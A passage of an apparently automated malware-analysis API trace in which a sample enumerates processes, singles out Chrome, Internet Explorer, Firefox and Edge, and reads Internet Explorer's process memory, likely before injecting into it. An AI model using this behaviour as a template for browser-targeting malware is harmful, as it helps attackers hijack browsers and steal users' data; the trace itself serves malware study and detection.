	[0227.366] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0227.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6094
	[0227.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.368] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0227.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.368] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.368] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0227.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.369] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0227.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6098
	[0227.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0227.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.371] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0227.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.371] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0227.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x609c
	[0227.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0227.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.373] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.373] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0227.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.374] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0227.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x60a0
	[0227.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.375] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0227.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.375] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.376] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0227.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.377] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.377] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0227.378] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x60a4
	[0227.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.379] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0227.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.379] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.379] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0227.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.380] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0227.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x60a8
	[0227.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.381] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0227.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.381] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.382] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0227.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.382] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0227.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x60ac
	[0227.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.384] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0227.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.384] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.385] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0227.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.385] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0227.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x60b0
	[0227.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.388] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0227.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.388] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.388] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0227.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.389] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0227.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x60b4
	[0227.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.390] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0227.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.390] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.391] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0227.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.391] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0227.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x60b8
	[0227.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.392] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0227.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.393] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.393] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0227.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.394] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0227.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x60bc
	[0227.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.395] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0227.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.396] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.396] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0227.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.397] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.397] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0227.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x60c0
	[0227.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.398] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0227.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.399] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.400] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0227.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.400] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0227.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x60c4
	[0227.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.401] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0227.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.402] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.403] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0227.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.404] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0227.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x60c8
	[0227.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.405] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0227.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.406] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.406] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0227.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.407] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x60cc
	[0227.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.408] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.408] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.408] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.409] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.409] NtQueryInformationProcess (in: ProcessHandle=0x60cc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.409] ReadProcessMemory (in: hProcess=0x60cc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.409] ReadProcessMemory (in: hProcess=0x60cc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.409] ReadProcessMemory (in: hProcess=0x60cc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.409] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.410] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x60d0
	[0227.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.411] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.411] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.411] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.412] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.412] NtQueryInformationProcess (in: ProcessHandle=0x60d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.412] ReadProcessMemory (in: hProcess=0x60d0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.412] ReadProcessMemory (in: hProcess=0x60d0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.413] ReadProcessMemory (in: hProcess=0x60d0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.413] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.413] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x60d4
	[0227.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.414] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.414] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.415] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.415] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0227.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x60d8
	[0227.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.416] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0227.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.417] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.417] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0227.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.418] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.418] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x60dc
	[0227.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.419] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.419] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.419] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.420] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.421] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x60e0
	[0227.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.422] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.422] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.422] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.423] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x60e4
	[0227.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.424] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.424] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.425] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.425] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x60e8
	[0227.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.426] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.427] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.427] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.427] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
